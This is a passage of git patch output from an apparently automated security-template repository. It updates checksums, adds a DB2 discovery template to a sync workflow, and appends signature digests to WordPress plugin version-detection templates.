-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:d23e148ee53bd60e666faffd7b7c2daa658defb1 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8771,6 +8771,7 @@ javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 javascript/misconfiguration/x11/x11-unauth-access.yaml:5203d11d0a980db3b9320e60273c35cbe459fdec +javascript/udp/detection/db2-discover.yaml:e45264af17ef101150a41c2d2905880f489b7ca8 javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964 @@ -8954,7 +8955,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fe8931b544a439887a880df5006d2869deab64e6 +templates-checksum.txt:9b49a5ec9df5ef74f5a381d0ca80d985c0a8b48d vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From ebbf93594538ec81e68e2848fc1a4c8cef00b015 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 2 Aug 2024 12:43:23 +0000 Subject: [PATCH 1837/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5bc7b67191..05f074bd9a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -27,6 +27,7 @@ on: - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' - 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml' - 'javascript/misconfiguration/x11/x11-unauth-access.yaml' + - 'javascript/udp/detection/db2-discover.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From e882d304efec2a9d47c369c12d3d84cb66d55f4e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Aug 2024 12:44:20 +0000 Subject: [PATCH 1838/1841] Auto Template Signing [Fri Aug 2 12:44:20 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + javascript/udp/detection/db2-discover.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..57aea5ce3f 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022026b5cdc41ac86b8c52f76ffcf11e23b43ff1b2bad1647ee05d7ab252148d98f6022100fe5d9aa62a97d70ad9f893d7b656c6a531ebabe41fcea67c3c1d2a6063b886c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..b959399685 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d347a5f59faa3b996e097001d0081ff96ade7a9a6781cdde8f62a35474667d8302203753f29543fea947fb36271b701ebcdafc19e8c82c3b5e11f7fb1bbd68e0ae7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..ab376f8ff8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f35a830204f3b9dce4f12d4e5c98c40f571acdbfe3be14a4d67ab2e986cf68b022100e081208ec3696a3bf2bae081af3e996266dbc2b451952e3d79432a01fd58cda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..6525963e13 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013642ec72c8cd6b4a12113dac1f8210e59f57528436d2cfef5d9585fd5cfd30e022002ca52537b485dc518c7d55fec8fbe01bd37486540c9302882965b14a84d9b79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..667f581889 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec20b7fc7f9ab0ad800e48d2ce02534af95c67c647ff2c851e382d5facc036f8022100e9246f67d6c127d2f30a64329925cfa6b4f11fb1904640b9b3ac993303cb3212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..e4a60d9f39 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c0fd7f94e1d820ff0c931f7111ec32e7b5ad0e325f1ba1cd08f8c5c862ba75202202428fa6165b88aa0739f7348a20af2195aeb1f88baedcf8150d3677cac201137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..5d45dc79c0 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b214056703cb95c7d59f69281b23cf7a2d759b46e9b848461e33a7be51aefccf02200e975be835baa07809d09161795767ed7a8702b5a351028f85567059b57d8e58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..485017f351 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220261cf253a8686a358a8d41b9bb06b480cbd33a7015361de328d14858bdbbd78902207ef84034f0be620ad1086add5d65befa5c8669559e8dcd81827e7199b68ffe13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..92445fcd54 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fdfa2ab3150033ad7f1f7ee11876b77782a100c8a36125f794f59234f340199b022077b08c5484727776ba3e4100c652847fb48ef0681c444de50d625c39471c369c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..c8920c9900 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004dfac004154d2562796f394f383ae2a58e157168571711ba3e8729f0382368502206c8bf8a84996062ca57c8f64ab567d4a6fa3fee001ab865a886911ec870bae19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..9a17923eec 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220368cf6a508b5e5fb753cb7f93bbb1df5f76cda1f2d6199364c2232c38be4b5330221008aa12ba57550f18c641b02e43a2468b5072ad9dc6f43ca8e0930dc34b94eba9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..7c272ef7a8 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008cec8d3631a8e7a1ad5d490bf1742bc87f9afc574a4e1229067a8277b0c008ba02204afb001d70aad15da037ba80649ad72b60683b5510361237bee861219bac4a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..e6a276eadc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084c192f2756ea541b5edddc6d9f13f267e7a45e8b5fcdce2530493545901c54c02200b5dd4586eeac2be9a22103b61981f4930d8161fdaca84565ec9d9d0a68d76cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..d37d78b6a8 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203254aa2cd2ca2dbc1fe31a2fd67fba93362ca2b06994c0245f7974e50308ba5a02204edf26e17f3c998c29dffb6c310ac56d2da92d137920a4a5fe4385943ac2ea65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..399a56af20 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100989cc7c79d8bcc5d41f982bd211d5413a4ed44703ed8d7f96e6edff938e5053102207a7fc4d5662dd46372c7d2fd683c7053dbcfca32b748376711cb1e607ff516b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..6ef94efeea 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd8f05d95d38ba12bc8c4e3cf4beb56f3ba7a3a326de4256a268a60dc50fbfad0220178aaa5ba52823f5368e943c8179c2eeae3c744c999d1f8be971ddaf7cfa4b93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..b04d3c0360 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1a4864312a79a166f7fae24558966bbf799aa4f2bcbcaf083b2b986cef9d68f022100c051073295c0c7bc78a1cde39a9fb0540f7901c3e61a6f5ced296f8940d475ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..b458a4a4e0 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088a69f0c4f7a0cd2b4ca482bfb047e297d848932afd0151c354cea1aa9055455022100a7d24e47aa5b0dfd1483e8beecb756f018ec8495553bf93ff03d4b3c9539e606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..f479c14902 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100858581a676101d5b5dfa1be775ffbd68b95528aefdfbf331c752fd6faa98d59f02202223f53a76215b3d293862d6fcc58857e51efc01bb644e6ac3eb4483d32721f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..8d9e21a8dc 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220322c1e6173e630126e7c1e51e2c94b95066610b7570331e0094a15f15e38b14b022100c26d06a7b554d3c58d6913789121ba60c77edc134d686b7ce0a1105f287d77d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..9c314b6035 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ff9f4df4ad1ecc966770b2d71391c5f6192eb8f26df337f453771e93a6cbc0bc022100d51828406ccd1e1ff1d06984e834cb48e8cc8caac4ad0044ab452868e58c2513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..2e1b886ef6 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf4a5bdf95af5b797d98e1f92c52a0128cf2bfd1445369960a02747959fd46870220773c6b2603a2b694b3ac57d00f507b22fbeb6b32ab532a9c8e43f12a7de00be0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..ca6c19647e 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ 